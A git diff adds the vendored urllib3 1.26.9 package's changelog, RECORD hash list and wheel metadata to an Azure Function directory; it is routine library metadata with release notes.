+------------------- + +* Fixed AppEngine import that didn't function on Python 3.5. (Pull #1025) + + +1.19 (2016-11-03) +----------------- + +* urllib3 now respects Retry-After headers on 413, 429, and 503 responses when + using the default retry logic. (Pull #955) + +* Remove markers from setup.py to assist ancient setuptools versions. (Issue + #986) + +* Disallow superscripts and other integerish things in URL ports. (Issue #989) + +* Allow urllib3's HTTPResponse.stream() method to continue to work with + non-httplib underlying FPs. (Pull #990) + +* Empty filenames in multipart headers are now emitted as such, rather than + being suppressed. (Issue #1015) + +* Prefer user-supplied Host headers on chunked uploads. (Issue #1009) + + +1.18.1 (2016-10-27) +------------------- + +* CVE-2016-9015. Users who are using urllib3 version 1.17 or 1.18 along with + PyOpenSSL injection and OpenSSL 1.1.0 *must* upgrade to this version. This + release fixes a vulnerability whereby urllib3 in the above configuration + would silently fail to validate TLS certificates due to erroneously setting + invalid flags in OpenSSL's ``SSL_CTX_set_verify`` function. These erroneous + flags do not cause a problem in OpenSSL versions before 1.1.0, which + interprets the presence of any flag as requesting certificate validation. + + There is no PR for this patch, as it was prepared for simultaneous disclosure + and release. The master branch received the same fix in Pull #1010. + + +1.18 (2016-09-26) +----------------- + +* Fixed incorrect message for IncompleteRead exception. (Pull #973) + +* Accept ``iPAddress`` subject alternative name fields in TLS certificates. + (Issue #258) + +* Fixed consistency of ``HTTPResponse.closed`` between Python 2 and 3. + (Issue #977) + +* Fixed handling of wildcard certificates when using PyOpenSSL. (Issue #979) + + +1.17 (2016-09-06) +----------------- + +* Accept ``SSLContext`` objects for use in SSL/TLS negotiation. (Issue #835) + +* ConnectionPool debug log now includes scheme, host, and port. (Issue #897) + +* Substantially refactored documentation. (Issue #887) + +* Used URLFetch default timeout on AppEngine, rather than hardcoding our own. + (Issue #858) + +* Normalize the scheme and host in the URL parser (Issue #833) + +* ``HTTPResponse`` contains the last ``Retry`` object, which now also + contains retries history. (Issue #848) + +* Timeout can no longer be set as boolean, and must be greater than zero. + (Pull #924) + +* Removed pyasn1 and ndg-httpsclient from dependencies used for PyOpenSSL. We + now use cryptography and idna, both of which are already dependencies of + PyOpenSSL. (Pull #930) + +* Fixed infinite loop in ``stream`` when amt=None. (Issue #928) + +* Try to use the operating system's certificates when we are using an + ``SSLContext``. (Pull #941) + +* Updated cipher suite list to allow ChaCha20+Poly1305. AES-GCM is preferred to + ChaCha20, but ChaCha20 is then preferred to everything else. (Pull #947) + +* Updated cipher suite list to remove 3DES-based cipher suites. (Pull #958) + +* Removed the cipher suite fallback to allow HIGH ciphers. (Pull #958) + +* Implemented ``length_remaining`` to determine remaining content + to be read. (Pull #949) + +* Implemented ``enforce_content_length`` to enable exceptions when + incomplete data chunks are received. (Pull #949) + +* Dropped connection start, dropped connection reset, redirect, forced retry, + and new HTTPS connection log levels to DEBUG, from INFO. (Pull #967) + + +1.16 (2016-06-11) +----------------- + +* Disable IPv6 DNS when IPv6 connections are not possible. (Issue #840) + +* Provide ``key_fn_by_scheme`` pool keying mechanism that can be + overridden. (Issue #830) + +* Normalize scheme and host to lowercase for pool keys, and include + ``source_address``. (Issue #830) + +* Cleaner exception chain in Python 3 for ``_make_request``. + (Issue #861) + +* Fixed installing ``urllib3[socks]`` extra. (Issue #864) + +* Fixed signature of ``ConnectionPool.close`` so it can actually safely be + called by subclasses. (Issue #873) + +* Retain ``release_conn`` state across retries. (Issues #651, #866) + +* Add customizable ``HTTPConnectionPool.ResponseCls``, which defaults to + ``HTTPResponse`` but can be replaced with a subclass. (Issue #879) + + +1.15.1 (2016-04-11) +------------------- + +* Fix packaging to include backports module. (Issue #841) + + +1.15 (2016-04-06) +----------------- + +* Added Retry(raise_on_status=False). (Issue #720) + +* Always use setuptools, no more distutils fallback. (Issue #785) + +* Dropped support for Python 3.2. (Issue #786) + +* Chunked transfer encoding when requesting with ``chunked=True``. + (Issue #790) + +* Fixed regression with IPv6 port parsing. (Issue #801) + +* Append SNIMissingWarning messages to allow users to specify it in + the PYTHONWARNINGS environment variable. (Issue #816) + +* Handle unicode headers in Py2. (Issue #818) + +* Log certificate when there is a hostname mismatch. (Issue #820) + +* Preserve order of request/response headers. (Issue #821) + + +1.14 (2015-12-29) +----------------- + +* contrib: SOCKS proxy support! (Issue #762) + +* Fixed AppEngine handling of transfer-encoding header and bug + in Timeout defaults checking. (Issue #763) + + +1.13.1 (2015-12-18) +------------------- + +* Fixed regression in IPv6 + SSL for match_hostname. (Issue #761) + + +1.13 (2015-12-14) +----------------- + +* Fixed ``pip install urllib3[secure]`` on modern pip. (Issue #706) + +* pyopenssl: Fixed SSL3_WRITE_PENDING error. (Issue #717) + +* pyopenssl: Support for TLSv1.1 and TLSv1.2. (Issue #696) + +* Close connections more defensively on exception. (Issue #734) + +* Adjusted ``read_chunked`` to handle gzipped, chunk-encoded bodies without + repeatedly flushing the decoder, to function better on Jython. (Issue #743) + +* Accept ``ca_cert_dir`` for SSL-related PoolManager configuration. (Issue #758) + + +1.12 (2015-09-03) +----------------- + +* Rely on ``six`` for importing ``httplib`` to work around + conflicts with other Python 3 shims. (Issue #688) + +* Add support for directories of certificate authorities, as supported by + OpenSSL. (Issue #701) + +* New exception: ``NewConnectionError``, raised when we fail to establish + a new connection, usually ``ECONNREFUSED`` socket error. + + +1.11 (2015-07-21) +----------------- + +* When ``ca_certs`` is given, ``cert_reqs`` defaults to + ``'CERT_REQUIRED'``. (Issue #650) + +* ``pip install urllib3[secure]`` will install Certifi and + PyOpenSSL as dependencies. (Issue #678) + +* Made ``HTTPHeaderDict`` usable as a ``headers`` input value + (Issues #632, #679) + +* Added `urllib3.contrib.appengine `_ + which has an ``AppEngineManager`` for using ``URLFetch`` in a + Google AppEngine environment. (Issue #664) + +* Dev: Added test suite for AppEngine. (Issue #631) + +* Fix performance regression when using PyOpenSSL. (Issue #626) + +* Passing incorrect scheme (e.g. ``foo://``) will raise + ``ValueError`` instead of ``AssertionError`` (backwards + compatible for now, but please migrate). (Issue #640) + +* Fix pools not getting replenished when an error occurs during a + request using ``release_conn=False``. (Issue #644) + +* Fix pool-default headers not applying for url-encoded requests + like GET. (Issue #657) + +* log.warning in Python 3 when headers are skipped due to parsing + errors. (Issue #642) + +* Close and discard connections if an error occurs during read. + (Issue #660) + +* Fix host parsing for IPv6 proxies. (Issue #668) + +* Separate warning type SubjectAltNameWarning, now issued once + per host. (Issue #671) + +* Fix ``httplib.IncompleteRead`` not getting converted to + ``ProtocolError`` when using ``HTTPResponse.stream()`` + (Issue #674) + +1.10.4 (2015-05-03) +------------------- + +* Migrate tests to Tornado 4. (Issue #594) + +* Append default warning configuration rather than overwrite. + (Issue #603) + +* Fix streaming decoding regression. (Issue #595) + +* Fix chunked requests losing state across keep-alive connections. + (Issue #599) + +* Fix hanging when chunked HEAD response has no body. (Issue #605) + + +1.10.3 (2015-04-21) +------------------- + +* Emit ``InsecurePlatformWarning`` when SSLContext object is missing. + (Issue #558) + +* Fix regression of duplicate header keys being discarded. + (Issue #563) + +* ``Response.stream()`` returns a generator for chunked responses. + (Issue #560) + +* Set upper-bound timeout when waiting for a socket in PyOpenSSL. + (Issue #585) + +* Work on platforms without `ssl` module for plain HTTP requests. + (Issue #587) + +* Stop relying on the stdlib's default cipher list. (Issue #588) + + +1.10.2 (2015-02-25) +------------------- + +* Fix file descriptor leakage on retries. (Issue #548) + +* Removed RC4 from default cipher list. (Issue #551) + +* Header performance improvements. (Issue #544) + +* Fix PoolManager not obeying redirect retry settings. (Issue #553) + + +1.10.1 (2015-02-10) +------------------- + +* Pools can be used as context managers. (Issue #545) + +* Don't re-use connections which experienced an SSLError. (Issue #529) + +* Don't fail when gzip decoding an empty stream. (Issue #535) + +* Add sha256 support for fingerprint verification. (Issue #540) + +* Fixed handling of header values containing commas. (Issue #533) + + +1.10 (2014-12-14) +----------------- + +* Disabled SSLv3. (Issue #473) + +* Add ``Url.url`` property to return the composed url string. (Issue #394) + +* Fixed PyOpenSSL + gevent ``WantWriteError``. (Issue #412) + +* ``MaxRetryError.reason`` will always be an exception, not string. + (Issue #481) + +* Fixed SSL-related timeouts not being detected as timeouts. (Issue #492) + +* Py3: Use ``ssl.create_default_context()`` when available. (Issue #473) + +* Emit ``InsecureRequestWarning`` for *every* insecure HTTPS request. + (Issue #496) + +* Emit ``SecurityWarning`` when certificate has no ``subjectAltName``. + (Issue #499) + +* Close and discard sockets which experienced SSL-related errors. + (Issue #501) + +* Handle ``body`` param in ``.request(...)``. (Issue #513) + +* Respect timeout with HTTPS proxy. (Issue #505) + +* PyOpenSSL: Handle ZeroReturnError exception. (Issue #520) + + +1.9.1 (2014-09-13) +------------------ + +* Apply socket arguments before binding. (Issue #427) + +* More careful checks if fp-like object is closed. (Issue #435) + +* Fixed packaging issues of some development-related files not + getting included. (Issue #440) + +* Allow performing *only* fingerprint verification. (Issue #444) + +* Emit ``SecurityWarning`` if system clock is waaay off. (Issue #445) + +* Fixed PyOpenSSL compatibility with PyPy. (Issue #450) + +* Fixed ``BrokenPipeError`` and ``ConnectionError`` handling in Py3. + (Issue #443) + + + +1.9 (2014-07-04) +---------------- + +* Shuffled around development-related files. If you're maintaining a distro + package of urllib3, you may need to tweak things. (Issue #415) + +* Unverified HTTPS requests will trigger a warning on the first request. See + our new `security documentation + `_ for details. + (Issue #426) + +* New retry logic and ``urllib3.util.retry.Retry`` configuration object. + (Issue #326) + +* All raised exceptions should now wrapped in a + ``urllib3.exceptions.HTTPException``-extending exception. (Issue #326) + +* All errors during a retry-enabled request should be wrapped in + ``urllib3.exceptions.MaxRetryError``, including timeout-related exceptions + which were previously exempt. Underlying error is accessible from the + ``.reason`` property. (Issue #326) + +* ``urllib3.exceptions.ConnectionError`` renamed to + ``urllib3.exceptions.ProtocolError``. (Issue #326) + +* Errors during response read (such as IncompleteRead) are now wrapped in + ``urllib3.exceptions.ProtocolError``. (Issue #418) + +* Requesting an empty host will raise ``urllib3.exceptions.LocationValueError``. + (Issue #417) + +* Catch read timeouts over SSL connections as + ``urllib3.exceptions.ReadTimeoutError``. (Issue #419) + +* Apply socket arguments before connecting. (Issue #427) + + +1.8.3 (2014-06-23) +------------------ + +* Fix TLS verification when using a proxy in Python 3.4.1. (Issue #385) + +* Add ``disable_cache`` option to ``urllib3.util.make_headers``. (Issue #393) + +* Wrap ``socket.timeout`` exception with + ``urllib3.exceptions.ReadTimeoutError``. (Issue #399) + +* Fixed proxy-related bug where connections were being reused incorrectly. + (Issues #366, #369) + +* Added ``socket_options`` keyword parameter which allows to define + ``setsockopt`` configuration of new sockets. (Issue #397) + +* Removed ``HTTPConnection.tcp_nodelay`` in favor of + ``HTTPConnection.default_socket_options``. (Issue #397) + +* Fixed ``TypeError`` bug in Python 2.6.4. (Issue #411) + + +1.8.2 (2014-04-17) +------------------ + +* Fix ``urllib3.util`` not being included in the package. + + +1.8.1 (2014-04-17) +------------------ + +* Fix AppEngine bug of HTTPS requests going out as HTTP. (Issue #356) + +* Don't install ``dummyserver`` into ``site-packages`` as it's only needed + for the test suite. (Issue #362) + +* Added support for specifying ``source_address``. (Issue #352) + + +1.8 (2014-03-04) +---------------- + +* Improved url parsing in ``urllib3.util.parse_url`` (properly parse '@' in + username, and blank ports like 'hostname:'). + +* New ``urllib3.connection`` module which contains all the HTTPConnection + objects. + +* Several ``urllib3.util.Timeout``-related fixes. Also changed constructor + signature to a more sensible order. [Backwards incompatible] + (Issues #252, #262, #263) + +* Use ``backports.ssl_match_hostname`` if it's installed. (Issue #274) + +* Added ``.tell()`` method to ``urllib3.response.HTTPResponse`` which + returns the number of bytes read so far. (Issue #277) + +* Support for platforms without threading. (Issue #289) + +* Expand default-port comparison in ``HTTPConnectionPool.is_same_host`` + to allow a pool with no specified port to be considered equal to to an + HTTP/HTTPS url with port 80/443 explicitly provided. (Issue #305) + +* Improved default SSL/TLS settings to avoid vulnerabilities. + (Issue #309) + +* Fixed ``urllib3.poolmanager.ProxyManager`` not retrying on connect errors. + (Issue #310) + +* Disable Nagle's Algorithm on the socket for non-proxies. A subset of requests + will send the entire HTTP request ~200 milliseconds faster; however, some of + the resulting TCP packets will be smaller. (Issue #254) + +* Increased maximum number of SubjectAltNames in ``urllib3.contrib.pyopenssl`` + from the default 64 to 1024 in a single certificate. (Issue #318) + +* Headers are now passed and stored as a custom + ``urllib3.collections_.HTTPHeaderDict`` object rather than a plain ``dict``. + (Issue #329, #333) + +* Headers no longer lose their case on Python 3. (Issue #236) + +* ``urllib3.contrib.pyopenssl`` now uses the operating system's default CA + certificates on inject. (Issue #332) + +* Requests with ``retries=False`` will immediately raise any exceptions without + wrapping them in ``MaxRetryError``. (Issue #348) + +* Fixed open socket leak with SSL-related failures. (Issue #344, #348) + + +1.7.1 (2013-09-25) +------------------ + +* Added granular timeout support with new ``urllib3.util.Timeout`` class. + (Issue #231) + +* Fixed Python 3.4 support. (Issue #238) + + +1.7 (2013-08-14) +---------------- + +* More exceptions are now pickle-able, with tests. (Issue #174) + +* Fixed redirecting with relative URLs in Location header. (Issue #178) + +* Support for relative urls in ``Location: ...`` header. (Issue #179) + +* ``urllib3.response.HTTPResponse`` now inherits from ``io.IOBase`` for bonus + file-like functionality. (Issue #187) + +* Passing ``assert_hostname=False`` when creating a HTTPSConnectionPool will + skip hostname verification for SSL connections. (Issue #194) + +* New method ``urllib3.response.HTTPResponse.stream(...)`` which acts as a + generator wrapped around ``.read(...)``. (Issue #198) + +* IPv6 url parsing enforces brackets around the hostname. (Issue #199) + +* Fixed thread race condition in + ``urllib3.poolmanager.PoolManager.connection_from_host(...)`` (Issue #204) + +* ``ProxyManager`` requests now include non-default port in ``Host: ...`` + header. (Issue #217) + +* Added HTTPS proxy support in ``ProxyManager``. (Issue #170 #139) + +* New ``RequestField`` object can be passed to the ``fields=...`` param which + can specify headers. (Issue #220) + +* Raise ``urllib3.exceptions.ProxyError`` when connecting to proxy fails. + (Issue #221) + +* Use international headers when posting file names. (Issue #119) + +* Improved IPv6 support. (Issue #203) + + +1.6 (2013-04-25) +---------------- + +* Contrib: Optional SNI support for Py2 using PyOpenSSL. (Issue #156) + +* ``ProxyManager`` automatically adds ``Host: ...`` header if not given. + +* Improved SSL-related code. ``cert_req`` now optionally takes a string like + "REQUIRED" or "NONE". Same with ``ssl_version`` takes strings like "SSLv23" + The string values reflect the suffix of the respective constant variable. + (Issue #130) + +* Vendored ``socksipy`` now based on Anorov's fork which handles unexpectedly + closed proxy connections and larger read buffers. (Issue #135) + +* Ensure the connection is closed if no data is received, fixes connection leak + on some platforms. (Issue #133) + +* Added SNI support for SSL/TLS connections on Py32+. (Issue #89) + +* Tests fixed to be compatible with Py26 again. (Issue #125) + +* Added ability to choose SSL version by passing an ``ssl.PROTOCOL_*`` constant + to the ``ssl_version`` parameter of ``HTTPSConnectionPool``. (Issue #109) + +* Allow an explicit content type to be specified when encoding file fields. + (Issue #126) + +* Exceptions are now pickleable, with tests. (Issue #101) + +* Fixed default headers not getting passed in some cases. (Issue #99) + +* Treat "content-encoding" header value as case-insensitive, per RFC 2616 + Section 3.5. (Issue #110) + +* "Connection Refused" SocketErrors will get retried rather than raised. + (Issue #92) + +* Updated vendored ``six``, no longer overrides the global ``six`` module + namespace. (Issue #113) + +* ``urllib3.exceptions.MaxRetryError`` contains a ``reason`` property holding + the exception that prompted the final retry. If ``reason is None`` then it + was due to a redirect. (Issue #92, #114) + +* Fixed ``PoolManager.urlopen()`` from not redirecting more than once. + (Issue #149) + +* Don't assume ``Content-Type: text/plain`` for multi-part encoding parameters + that are not files. (Issue #111) + +* Pass `strict` param down to ``httplib.HTTPConnection``. (Issue #122) + +* Added mechanism to verify SSL certificates by fingerprint (md5, sha1) or + against an arbitrary hostname (when connecting by IP or for misconfigured + servers). (Issue #140) + +* Streaming decompression support. (Issue #159) + + +1.5 (2012-08-02) +---------------- + +* Added ``urllib3.add_stderr_logger()`` for quickly enabling STDERR debug + logging in urllib3. + +* Native full URL parsing (including auth, path, query, fragment) available in + ``urllib3.util.parse_url(url)``. + +* Built-in redirect will switch method to 'GET' if status code is 303. + (Issue #11) + +* ``urllib3.PoolManager`` strips the scheme and host before sending the request + uri. (Issue #8) + +* New ``urllib3.exceptions.DecodeError`` exception for when automatic decoding, + based on the Content-Type header, fails. + +* Fixed bug with pool depletion and leaking connections (Issue #76). Added + explicit connection closing on pool eviction. Added + ``urllib3.PoolManager.clear()``. + +* 99% -> 100% unit test coverage. + + +1.4 (2012-06-16) +---------------- + +* Minor AppEngine-related fixes. + +* Switched from ``mimetools.choose_boundary`` to ``uuid.uuid4()``. + +* Improved url parsing. (Issue #73) + +* IPv6 url support. (Issue #72) + + +1.3 (2012-03-25) +---------------- + +* Removed pre-1.0 deprecated API. + +* Refactored helpers into a ``urllib3.util`` submodule. + +* Fixed multipart encoding to support list-of-tuples for keys with multiple + values. (Issue #48) + +* Fixed multiple Set-Cookie headers in response not getting merged properly in + Python 3. (Issue #53) + +* AppEngine support with Py27. (Issue #61) + +* Minor ``encode_multipart_formdata`` fixes related to Python 3 strings vs + bytes. + + +1.2.2 (2012-02-06) +------------------ + +* Fixed packaging bug of not shipping ``test-requirements.txt``. (Issue #47) + + +1.2.1 (2012-02-05) +------------------ + +* Fixed another bug related to when ``ssl`` module is not available. (Issue #41) + +* Location parsing errors now raise ``urllib3.exceptions.LocationParseError`` + which inherits from ``ValueError``. + + +1.2 (2012-01-29) +---------------- + +* Added Python 3 support (tested on 3.2.2) + +* Dropped Python 2.5 support (tested on 2.6.7, 2.7.2) + +* Use ``select.poll`` instead of ``select.select`` for platforms that support + it. + +* Use ``Queue.LifoQueue`` instead of ``Queue.Queue`` for more aggressive + connection reusing. Configurable by overriding ``ConnectionPool.QueueCls``. + +* Fixed ``ImportError`` during install when ``ssl`` module is not available. + (Issue #41) + +* Fixed ``PoolManager`` redirects between schemes (such as HTTP -> HTTPS) not + completing properly. (Issue #28, uncovered by Issue #10 in v1.1) + +* Ported ``dummyserver`` to use ``tornado`` instead of ``webob`` + + ``eventlet``. Removed extraneous unsupported dummyserver testing backends. + Added socket-level tests. + +* More tests. Achievement Unlocked: 99% Coverage. + + +1.1 (2012-01-07) +---------------- + +* Refactored ``dummyserver`` to its own root namespace module (used for + testing). + +* Added hostname verification for ``VerifiedHTTPSConnection`` by vendoring in + Py32's ``ssl_match_hostname``. (Issue #25) + +* Fixed cross-host HTTP redirects when using ``PoolManager``. (Issue #10) + +* Fixed ``decode_content`` being ignored when set through ``urlopen``. (Issue + #27) + +* Fixed timeout-related bugs. (Issues #17, #23) + + +1.0.2 (2011-11-04) +------------------ + +* Fixed typo in ``VerifiedHTTPSConnection`` which would only present as a bug if + you're using the object manually. (Thanks pyos) + +* Made RecentlyUsedContainer (and consequently PoolManager) more thread-safe by + wrapping the access log in a mutex. (Thanks @christer) + +* Made RecentlyUsedContainer more dict-like (corrected ``__delitem__`` and + ``__getitem__`` behaviour), with tests. Shouldn't affect core urllib3 code. + + +1.0.1 (2011-10-10) +------------------ + +* Fixed a bug where the same connection would get returned into the pool twice, + causing extraneous "HttpConnectionPool is full" log warnings. + + +1.0 (2011-10-08) +---------------- + +* Added ``PoolManager`` with LRU expiration of connections (tested and + documented). +* Added ``ProxyManager`` (needs tests, docs, and confirmation that it works + with HTTPS proxies). +* Added optional partial-read support for responses when + ``preload_content=False``. You can now make requests and just read the headers + without loading the content. +* Made response decoding optional (default on, same as before). +* Added optional explicit boundary string for ``encode_multipart_formdata``. +* Convenience request methods are now inherited from ``RequestMethods``. Old + helpers like ``get_url`` and ``post_url`` should be abandoned in favour of + the new ``request(method, url, ...)``. +* Refactored code to be even more decoupled, reusable, and extendable. +* License header added to ``.py`` files. +* Embiggened the documentation: Lots of Sphinx-friendly docstrings in the code + and docs in ``docs/`` and on https://urllib3.readthedocs.io/. +* Embettered all the things! +* Started writing this file. + + +0.4.1 (2011-07-17) +------------------ + +* Minor bug fixes, code cleanup. + + +0.4 (2011-03-01) +---------------- + +* Better unicode support. +* Added ``VerifiedHTTPSConnection``. +* Added ``NTLMConnectionPool`` in contrib. +* Minor improvements. + + +0.3.1 (2010-07-13) +------------------ + +* Added ``assert_host_name`` optional parameter. Now compatible with proxies. + + +0.3 (2009-12-10) +---------------- + +* Added HTTPS support. +* Minor bug fixes. +* Refactored, broken backwards compatibility with 0.2. +* API to be treated as stable from this version forward. + + +0.2 (2008-11-17) +---------------- + +* Added unit tests. +* Bug fixes. + + +0.1 (2008-11-16) +---------------- + +* First release. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD new file mode 100644 index 0000000..690c42e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD @@ -0,0 +1,82 @@ +urllib3-1.26.9.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +urllib3-1.26.9.dist-info/LICENSE.txt,sha256=w3vxhuJ8-dvpYZ5V7f486nswCRzrPaY8fay-Dm13kHs,1115 +urllib3-1.26.9.dist-info/METADATA,sha256=UicmDwTLIrYL2O4fOBvq8wxMMAwM2L8JYP75jEXt8DQ,46325 +urllib3-1.26.9.dist-info/RECORD,, +urllib3-1.26.9.dist-info/WHEEL,sha256=z9j0xAa_JmUKMpmz72K0ZGALSM_n-wQVmGbleXx2VHg,110 +urllib3-1.26.9.dist-info/top_level.txt,sha256=EMiXL2sKrTcmrMxIHTqdc3ET54pQI2Y072LexFEemvo,8 +urllib3/__init__.py,sha256=j3yzHIbmW7CS-IKQJ9-PPQf_YKO8EOAey_rMW0UR7us,2763 +urllib3/__pycache__/__init__.cpython-39.pyc,, +urllib3/__pycache__/_collections.cpython-39.pyc,, +urllib3/__pycache__/_version.cpython-39.pyc,, +urllib3/__pycache__/connection.cpython-39.pyc,, +urllib3/__pycache__/connectionpool.cpython-39.pyc,, +urllib3/__pycache__/exceptions.cpython-39.pyc,, +urllib3/__pycache__/fields.cpython-39.pyc,, +urllib3/__pycache__/filepost.cpython-39.pyc,, +urllib3/__pycache__/poolmanager.cpython-39.pyc,, +urllib3/__pycache__/request.cpython-39.pyc,, +urllib3/__pycache__/response.cpython-39.pyc,, +urllib3/_collections.py,sha256=Rp1mVyBgc_UlAcp6M3at1skJBXR5J43NawRTvW2g_XY,10811 +urllib3/_version.py,sha256=WE7GLYd0IVwgk-1gQZ-7jw00bCUYjYTIlcWIk7NOhEM,63 +urllib3/connection.py,sha256=mMuCIjdG01kRpFUENwJRoDKmYer7CZO56pfTbBCS7cw,20070 +urllib3/connectionpool.py,sha256=qz-ICrW6g4TZVCbDQ8fRe68BMpXkskkR9vAVY9zUWtA,39013 +urllib3/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/contrib/__pycache__/__init__.cpython-39.pyc,, +urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc,, +urllib3/contrib/__pycache__/appengine.cpython-39.pyc,, +urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc,, +urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc,, +urllib3/contrib/__pycache__/securetransport.cpython-39.pyc,, +urllib3/contrib/__pycache__/socks.cpython-39.pyc,, +urllib3/contrib/_appengine_environ.py,sha256=bDbyOEhW2CKLJcQqAKAyrEHN-aklsyHFKq6vF8ZFsmk,957 +urllib3/contrib/_securetransport/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc,, +urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc,, +urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc,, +urllib3/contrib/_securetransport/bindings.py,sha256=4Xk64qIkPBt09A5q-RIFUuDhNc9mXilVapm7WnYnzRw,17632 +urllib3/contrib/_securetransport/low_level.py,sha256=B2JBB2_NRP02xK6DCa1Pa9IuxrPwxzDzZbixQkb7U9M,13922 +urllib3/contrib/appengine.py,sha256=jz515jZYBDFTnhR4zqfeaCo6JdDgAQqYbqzHK9sDkfw,11010 +urllib3/contrib/ntlmpool.py,sha256=ej9gGvfAb2Gt00lafFp45SIoRz-QwrQ4WChm6gQmAlM,4538 +urllib3/contrib/pyopenssl.py,sha256=YIMyTiXiLPV_QfFw3PjZ31mGqJmM5EzxIjhSLxZ7VUM,16874 +urllib3/contrib/securetransport.py,sha256=izdx43gFoUGFSgxasZlOCL42FaM4vSsAVTmhO0EH1vM,34417 +urllib3/contrib/socks.py,sha256=aRi9eWXo9ZEb95XUxef4Z21CFlnnjbEiAo9HOseoMt4,7097 +urllib3/exceptions.py,sha256=0Mnno3KHTNfXRfY7638NufOPkUb6mXOm-Lqj-4x2w8A,8217 +urllib3/fields.py,sha256=kvLDCg_JmH1lLjUUEY_FLS8UhY7hBvDPuVETbY8mdrM,8579 +urllib3/filepost.py,sha256=5b_qqgRHVlL7uLtdAYBzBh-GHmU5AfJVt_2N0XS3PeY,2440 +urllib3/packages/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/packages/__pycache__/__init__.cpython-39.pyc,, +urllib3/packages/__pycache__/six.cpython-39.pyc,, +urllib3/packages/backports/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc,, +urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc,, +urllib3/packages/backports/makefile.py,sha256=nbzt3i0agPVP07jqqgjhaYjMmuAi_W5E0EywZivVO8E,1417 +urllib3/packages/six.py,sha256=1LVW7ljqRirFlfExjwl-v1B7vSAUNTmzGMs-qays2zg,34666 +urllib3/poolmanager.py,sha256=0KOOJECoeLYVjUHvv-0h4Oq3FFQQ2yb-Fnjkbj8gJO0,19786 +urllib3/request.py,sha256=ZFSIqX0C6WizixecChZ3_okyu7BEv0lZu1VT0s6h4SM,5985 +urllib3/response.py,sha256=9b5NrbzHDnC2l_QC9uuNQPv75is1qgLa7M3Ax4Zr9z8,28276 +urllib3/util/__init__.py,sha256=JEmSmmqqLyaw8P51gUImZh8Gwg9i1zSe-DoqAitn2nc,1155 +urllib3/util/__pycache__/__init__.cpython-39.pyc,, +urllib3/util/__pycache__/connection.cpython-39.pyc,, +urllib3/util/__pycache__/proxy.cpython-39.pyc,, +urllib3/util/__pycache__/queue.cpython-39.pyc,, +urllib3/util/__pycache__/request.cpython-39.pyc,, +urllib3/util/__pycache__/response.cpython-39.pyc,, +urllib3/util/__pycache__/retry.cpython-39.pyc,, +urllib3/util/__pycache__/ssl_.cpython-39.pyc,, +urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc,, +urllib3/util/__pycache__/ssltransport.cpython-39.pyc,, +urllib3/util/__pycache__/timeout.cpython-39.pyc,, +urllib3/util/__pycache__/url.cpython-39.pyc,, +urllib3/util/__pycache__/wait.cpython-39.pyc,, +urllib3/util/connection.py,sha256=5Lx2B1PW29KxBn2T0xkN1CBgRBa3gGVJBKoQoRogEVk,4901 +urllib3/util/proxy.py,sha256=zUvPPCJrp6dOF0N4GAVbOcl6o-4uXKSrGiTkkr5vUS4,1605 +urllib3/util/queue.py,sha256=nRgX8_eX-_VkvxoX096QWoz8Ps0QHUAExILCY_7PncM,498 +urllib3/util/request.py,sha256=fWiAaa8pwdLLIqoTLBxCC2e4ed80muzKU3e3HWWTzFQ,4225 +urllib3/util/response.py,sha256=GJpg3Egi9qaJXRwBh5wv-MNuRWan5BIu40oReoxWP28,3510 +urllib3/util/retry.py,sha256=iESg2PvViNdXBRY4MpL4h0kqwOOkHkxmLn1kkhFHPU8,22001 +urllib3/util/ssl_.py,sha256=c0sYiSC6272r6uPkxQpo5rYPP9QC1eR6oI7004gYqZo,17165 +urllib3/util/ssl_match_hostname.py,sha256=Ir4cZVEjmAk8gUAIHWSi7wtOO83UCYABY2xFD1Ql_WA,5758 +urllib3/util/ssltransport.py,sha256=NA-u5rMTrDFDFC8QzRKUEKMG0561hOD4qBTr3Z4pv6E,6895 +urllib3/util/timeout.py,sha256=QSbBUNOB9yh6AnDn61SrLQ0hg5oz0I9-uXEG91AJuIg,10003 +urllib3/util/url.py,sha256=au9jkUMnVr9Qp_9kg4HfZx9q9ur6yXQ4u5M17In-UKY,14030 +urllib3/util/wait.py,sha256=3MUKRSAUJDB2tgco7qRUskW0zXGAWYvRRE4Q1_6xlLs,5404 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL new file mode 100644 index 0000000..5b8c32a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt new file mode 100644 index 0000000..e8df8e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt @@ -0,0 +1 @@ +urllib3 diff --git 